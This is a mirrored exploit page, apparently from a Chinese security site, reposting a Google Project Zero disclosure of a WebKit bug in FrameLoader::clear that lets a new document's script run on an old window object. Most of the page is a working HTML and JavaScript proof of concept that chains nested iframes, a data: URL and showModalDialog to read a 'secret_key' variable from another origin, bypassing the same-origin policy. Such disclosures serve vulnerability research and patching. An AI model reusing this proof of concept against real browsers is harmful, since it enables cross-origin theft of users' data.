首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 WebKit - Stealing Variables via Page Navigation in FrameLoader::clear 来源：Google Security Research 作者：Google 发布时间：2017-05-31   <!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1162   void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView) {     m_frame.editor().clear();       if (!m_needsClear)         return;     m_needsClear = false;          if (m_frame.document()->pageCacheState() != Document::InPageCache) {         ...         m_frame.document()->prepareForDestruction(); <<-------- (a)         if (hadLivingRenderTree)             m_frame.document()->removeFocusedNodeOfSubtree(*m_frame.document());     }     ...     m_frame.setDocument(nullptr); <<------- (b)     ...     if (clearWindowProperties)         m_frame.script().setDOMWindowForWindowShell(newDocument->domWindow()); <<------- (c)     ... }   FrameLoader::clear is called when page navigation is made and it does: 1. clear the old document at (b). 2. attach the new window object at (c).   If a new page navigation is made at (a), the new window will not attached due to |m_needsClear| check. As a result, the new document's script will be execute on the old window object.   PoC will reproduce to steal |secret_key| value from another origin(data:text/html,...).   PoC: -->   <body> Click anywhere. <script> function createURL(data, type = 'text/html') {     return URL.createObjectURL(new Blob([data], {type: type})); }   window.onclick = () => {     window.onclick = null;       let f = document.body.appendChild(document.createElement('iframe'));     f.contentDocument.open();     f.contentDocument.onreadystatechange = () => {         f.contentDocument.onreadystatechange = null;           let g = f.contentDocument.appendChild(document.createElement('iframe'));         g.contentDocument.open();         g.contentDocument.onreadystatechange = () => {             g.contentDocument.onreadystatechange = null;               f.contentWindow.__defineGetter__('navigator', function () {                 return {};             });               let a = f.contentDocument.createElement('a');             a.href = 'data:text/html,' + encodeURI(`<script>var secret_key = '23412341234';</scrip` + 't>');             a.click();               showModalDialog(createURL(` <script> let it = setInterval(() => {     try {         opener[0].frameElement.contentDocument.x;     } catch (e) {         clearInterval(it);         window.close();     } }, 100); </scrip` + 't>'));               alert('secret_key:' + f.contentWindow.secret_key);             //showModalDialog('about:blank');         };     };       f.src = 'javascript:""'; }   </script> </body>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·WebKit - enqueuePageshowEvent ·Apple Safari 10.0.3(12602.4.8) ·WebKit - 'ContainerNode::parse ·Skia Graphics Library - Heap O ·Apple WebKit / Safari 10.0.3(1 ·Mozilla Firefox < 53 - 'gfxTex ·Apple WebKit / Safari 10.0.3(1 ·Mozilla Firefox < 53 - 'Convol ·Samba 3.5.0 - Remote Code Exec ·Sandboxie 5.18 - Local Denial ·Samba is_known_pipename() Arbi ·JAD java Decompiler 1.5.8e - L   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved